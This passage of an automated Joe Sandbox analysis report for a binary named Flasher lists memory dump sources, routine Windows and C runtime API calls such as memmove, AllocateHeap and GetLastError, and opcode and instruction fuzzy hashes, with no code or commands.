                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6D35DF904), ref: 00007FF6D35DC123
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorFileHandleInformationLast
                                                                      • String ID:
                                                                      • API String ID: 275135790-0
                                                                      • Opcode ID: b2800c01d4a0b6e0ae6cfacb6640a5868ac782acb592ae54ba47d2c9a4290ed9
                                                                      • Instruction ID: af1bb8b78510e63fee2a254f8e7eb93e515050adf0b748e4a9151b7ec6c8db9c
                                                                      • Opcode Fuzzy Hash: b2800c01d4a0b6e0ae6cfacb6640a5868ac782acb592ae54ba47d2c9a4290ed9
                                                                      • Instruction Fuzzy Hash: 45314C72A146518BF320CFA5E8417ADB7B0FB58788F108125DF9963B44EF78E991C750
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLastOverlappedResult
                                                                      • String ID:
                                                                      • API String ID: 185562886-0
                                                                      • Opcode ID: 0bf254be5dce02d381a3ff03b406df64ddad6841e4ecc19538bb80963aab3f65
                                                                      • Instruction ID: fade88c46bb033dd5d633005f02f1839592310e683b2f8fae4149a5707eaee55
                                                                      • Opcode Fuzzy Hash: 0bf254be5dce02d381a3ff03b406df64ddad6841e4ecc19538bb80963aab3f65
                                                                      • Instruction Fuzzy Hash: C9116A2BF1875A95FB688A62C54237DA660AB45784F1A0837CE1DF3B84CF38E4B19210
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorFileLastPointer
                                                                      • String ID:
                                                                      • API String ID: 2976181284-0
                                                                      • Opcode ID: fb203139ff1ff435133bc42319f49413190dd0bb698b1ba704a672b92036fbaf
                                                                      • Instruction ID: acf8946083501338af79fad7b7a15ff0d5d04e8d4f5d61e2c4b3bdcf39da0286
                                                                      • Opcode Fuzzy Hash: fb203139ff1ff435133bc42319f49413190dd0bb698b1ba704a672b92036fbaf
                                                                      • Instruction Fuzzy Hash: B0E0EDA5F14A85DAFB0097B1E4023EDA7A1AB48B84F880033CD4CA7348DE3CE1A4C290
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 44120a0c63f12277b5d72a0639278a37913bd5a2f55b4f0ab567adc4fd95264e
                                                                      • Instruction ID: 163e5601c475d4bbe61a3b6b80ea5d06beec33bbbb05b5eba9dde98491fb662c
                                                                      • Opcode Fuzzy Hash: 44120a0c63f12277b5d72a0639278a37913bd5a2f55b4f0ab567adc4fd95264e
                                                                      • Instruction Fuzzy Hash: 7DA1C436B08A8286EB70DE26C58193DB7A5FB44F98F144037CA4DD77A5DEB8E964C304
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: memmovestrlen
                                                                      • String ID:
                                                                      • API String ID: 3405231851-0
                                                                      • Opcode ID: 1e538c007ce42500fb47034b3200a02c5e5fa5007d29b494cc324cb040967b40
                                                                      • Instruction ID: bf9e52623834ed367421bde788fb682b2314c3b63088585dd73f959d1de9af60
                                                                      • Opcode Fuzzy Hash: 1e538c007ce42500fb47034b3200a02c5e5fa5007d29b494cc324cb040967b40
                                                                      • Instruction Fuzzy Hash: EE510A11A097D182FA559B26590617DABA0BF44BC0F048436DF4EE7BA5EE3CE425E700
                                                                      APIs
                                                                      • memmove.VCRUNTIME140(?,?,-0000003C,00000000,?,?,?,00007FF6D3535E37), ref: 00007FF6D3535C0A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: memmove
                                                                      • String ID:
                                                                      • API String ID: 2162964266-0
                                                                      • Opcode ID: e60561b9c0a30a80beb872fbd35096db2cbd1c98b46c39d5858ddf26955605b2
                                                                      • Instruction ID: cf27d733787a69fc07f0aba32c572b8aab623595947b73b46c098913804fd1e0
                                                                      • Opcode Fuzzy Hash: e60561b9c0a30a80beb872fbd35096db2cbd1c98b46c39d5858ddf26955605b2
                                                                      • Instruction Fuzzy Hash: BA517272709B4A82EA24CF16E4462ACA764FB14784F559832CF8EA7B51CF3DF5658340
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 39e5083847062552e83448504f1d8caa8d3dc84e8d198d52eb070f0aedc3c0f7
                                                                      • Instruction ID: 8f7a6594e139310440348508e399b5626e2772624b8a8914f55272575e0388be
                                                                      • Opcode Fuzzy Hash: 39e5083847062552e83448504f1d8caa8d3dc84e8d198d52eb070f0aedc3c0f7
                                                                      • Instruction Fuzzy Hash: 60710576618B8182D6609B46F84136EF7A5F789BD0F584136EE8D97B68CF3DD0A1CB00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeHeap$Find$CloseFileFirstmemset
                                                                      • String ID:
                                                                      • API String ID: 2317575439-0
                                                                      • Opcode ID: da94006322c7723b207a50dc5c5c4e895e44b38897a30b36d2501d4fe40e177e
                                                                      • Instruction ID: afb207e792345958b273dfcc084e4a1db0931a39adb040ada7bb8a7bd2010608
                                                                      • Opcode Fuzzy Hash: da94006322c7723b207a50dc5c5c4e895e44b38897a30b36d2501d4fe40e177e
                                                                      • Instruction Fuzzy Hash: D1516227E14B858AE7208F35E9413ACB760FB98758F049226DF9D62BA5DF38E1D5C340
                                                                      APIs
                                                                      • memset.VCRUNTIME140(?,?,?,00007FF6D36C648D,?,00000000,?,00007FF6D36C6161,?,?,?,00000000,00000035,?,?,?), ref: 00007FF6D36CACEF
                                                                      • memmove.VCRUNTIME140(?,?,?,00007FF6D36C648D,?,00000000,?,00007FF6D36C6161,?,?,?,00000000,00000035,?,?,?), ref: 00007FF6D36CACFE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: memmovememset
                                                                      • String ID:
                                                                      • API String ID: 1288253900-0
                                                                      • Opcode ID: fafe4497f334237b98f03d211de4b1360e3ada61a91b96e9834ee2c0b3f4386d
                                                                      • Instruction ID: 0387fed395a788f53bda32fdcde540e9f4d3adec4e4ce70eb4f69c357d61c9b4
                                                                      • Opcode Fuzzy Hash: fafe4497f334237b98f03d211de4b1360e3ada61a91b96e9834ee2c0b3f4386d
                                                                      • Instruction Fuzzy Hash: 3A21D732704A8287EB648F66E4816ADB760FB88B84F148032EF5D97755DF38D891C740
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeHeap
                                                                      • String ID:
                                                                      • API String ID: 3298025750-0
                                                                      • Opcode ID: ec982dfeece64499e658e951281a77ed7fda13c36d773b8f762b5709ae8424fe
                                                                      • Instruction ID: fd331144ba991febe56a100bc9711f059fd325203d6cc59209052795a749c7bd
                                                                      • Opcode Fuzzy Hash: ec982dfeece64499e658e951281a77ed7fda13c36d773b8f762b5709ae8424fe
                                                                      • Instruction Fuzzy Hash: 88216D27A08F559AEB10CB61E8453ADA360FB84B68F048237CE1DA7794DF38D555C340
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocString
                                                                      • String ID:
                                                                      • API String ID: 2525500382-0
                                                                      • Opcode ID: b15b679657002a586231db236e6f36ac5cf0e88c8b0464b65700d103173cb63c
                                                                      • Instruction ID: d9d29c9d00b50c17a27f54f32484a8918089a5cc02332da1e51af3960d34b98e
                                                                      • Opcode Fuzzy Hash: b15b679657002a586231db236e6f36ac5cf0e88c8b0464b65700d103173cb63c
                                                                      • Instruction Fuzzy Hash: B9410762F1A6E242FB7C06276423B3DDD42DF913C0E18823AEA5F96BC0DD7DA0217614
                                                                      APIs
                                                                      • RtlReAllocateHeap.NTDLL(-8000000000000000,?,?,?,00007FF6D37383D4), ref: 00007FF6D35D9733
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      • Opcode ID: 2d66567e530e3d26393e6afbc162ee92cc08f2887579838573606ecd0dc08e91
                                                                      • Instruction ID: 3d96bfeabbd5280ee9582d12e235fda1efed5d7c015f99fb8c2e61b4be8de9b9
                                                                      • Opcode Fuzzy Hash: 2d66567e530e3d26393e6afbc162ee92cc08f2887579838573606ecd0dc08e91
                                                                      • Instruction Fuzzy Hash: 5601DB22A09B5982F6555B12B9463BCA390BF4AB90F484037DE1D97794DF3CA4B2C200
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      • Opcode ID: 0e6437d9f92b7b2ce10eda25ef2eab246bbe6dcd70b08cedbcb8c7afa5650af1
                                                                      • Instruction ID: 54cf48df53d217c3501e9006849bb1da999d111c228eb295caf9e3d965922730
                                                                      • Opcode Fuzzy Hash: 0e6437d9f92b7b2ce10eda25ef2eab246bbe6dcd70b08cedbcb8c7afa5650af1
                                                                      • Instruction Fuzzy Hash: E5F0A422A09B5942F6595B16A9563BDE3A0AF45F90F08807BCA4DE7B94CF3C64B2C305
                                                                      APIs
                                                                      • RtlReAllocateHeap.NTDLL(?,?,?,?,00007FF6D36070AB,?,?,?,?,?,?,?,?,?,00007FF6D3739C3D), ref: 00007FF6D357C99E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      • Opcode ID: ae617a080697acd2961305dd07b90a5fa0d4ca0d7bdc1ffd76f0a8751cb5af92
                                                                      • Instruction ID: a06e6e41f2c51f32ae876a26389d9ff5c4fc139c90744eda2c849776aa89f5c3
                                                                      • Opcode Fuzzy Hash: ae617a080697acd2961305dd07b90a5fa0d4ca0d7bdc1ffd76f0a8751cb5af92
                                                                      • Instruction Fuzzy Hash: 23F0C862E09B4692E7995721B94637DE2B1AF447C0F14C037CA8DE6798DF3CB4A5C301
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      • Opcode ID: 0a5f65c2f8ce7121faf4cd68b849d8c90c5837d17850cd0af747543237756997
                                                                      • Instruction ID: ff4df3f15cdb0bfd2338cd5b90c036bc509bf97d5780230df5b9b5d6042886be
                                                                      • Opcode Fuzzy Hash: 0a5f65c2f8ce7121faf4cd68b849d8c90c5837d17850cd0af747543237756997
                                                                      • Instruction Fuzzy Hash: 46F09661A09A8582F6585726B98737DB3A1EF487C0F14C03BCA4DD7799CFBC94A1D300
                                                                      APIs
                                                                      • memmove.VCRUNTIME140(?,00000000,00000000,00007FF6D36D1E5F,00000000,00000000,00000080,00007FF6D3700310), ref: 00007FF6D36D82AB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: memmove
                                                                      • String ID:
                                                                      • API String ID: 2162964266-0
                                                                      • Opcode ID: f1a04a34d92d0b2dd32c21f822720fd695efd21a5531098416e3bfd2984fe55e
                                                                      • Instruction ID: efc0cc593d65ac8fe4b6df38a069d92e9ae3dd65083e475dc52b6da2276c3401
                                                                      • Opcode Fuzzy Hash: f1a04a34d92d0b2dd32c21f822720fd695efd21a5531098416e3bfd2984fe55e
                                                                      • Instruction Fuzzy Hash: 0791D622D086C381FB659F35A41623DABA0FB95B44F2D0132CE4DA3695DE38EC74D384
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: memcmp
                                                                      • String ID:
                                                                      • API String ID: 1475443563-0
                                                                      • Opcode ID: 1c9a1b6bb6cdd98e2bf31c494d7692b1cbb634f3bc2db355a774a1ea0a3441a2
                                                                      • Instruction ID: c18aa489e53c55d05dfaec10c52a671f9d9fe2452734c5d8d5555c109d792197
                                                                      • Opcode Fuzzy Hash: 1c9a1b6bb6cdd98e2bf31c494d7692b1cbb634f3bc2db355a774a1ea0a3441a2
                                                                      • Instruction Fuzzy Hash: 4671B323A18B8585E7118B29E4013ADB760FB99794F049326EFCCA3B65EF38D1D6C700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: memcmp
                                                                      • String ID:
                                                                      • API String ID: 1475443563-0
                                                                      • Opcode ID: 08b7e1b0333714c28639a3e41d0c310d9b124c42977df98b89da8d7cb61fc176
                                                                      • Instruction ID: e3fab67b6d104e79d697c6b9567741c2a31b3a363917fd5ea00972b68f570b80
                                                                      • Opcode Fuzzy Hash: 08b7e1b0333714c28639a3e41d0c310d9b124c42977df98b89da8d7cb61fc176
                                                                      • Instruction Fuzzy Hash: 8B518072618B4582DA51DF16E4417BEBBA9FB84BC4F018226EF8E93754DF38E5A1C700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: memset
                                                                      • String ID:
                                                                      • API String ID: 2221118986-0
                                                                      • Opcode ID: bdb888ad571ac1a1a775bf4ce459e1b00bca3ad84a13d418de4d24e3bb05ea7d
                                                                      • Instruction ID: 45d5acd09290bf7675cb77e1f5048e4913fee040ea21e4cfe5f96e2a931451d3
                                                                      • Opcode Fuzzy Hash: bdb888ad571ac1a1a775bf4ce459e1b00bca3ad84a13d418de4d24e3bb05ea7d
                                                                      • Instruction Fuzzy Hash: 18515E32909F8582E6558B28E4413E9B3A0FB98744F149231DF9C63765EF7DE6E6C300
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: memmove
                                                                      • String ID:
                                                                      • API String ID: 2162964266-0
                                                                      • Opcode ID: 394aafa7f695e05f6b17ea05effd48d5cd9494e077184056a9c07229a719dfa3
                                                                      • Instruction ID: 841fba5008357b212794fbb1d3e1a182ca8e9d49b48ae72a0fe5c0f310b1f1df
                                                                      • Opcode Fuzzy Hash: 394aafa7f695e05f6b17ea05effd48d5cd9494e077184056a9c07229a719dfa3
                                                                      • Instruction Fuzzy Hash: 7431CE62A08AC492F6218B18E5077FCA7A0BFD4390F546132EE8963754EF3DD2E6C700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
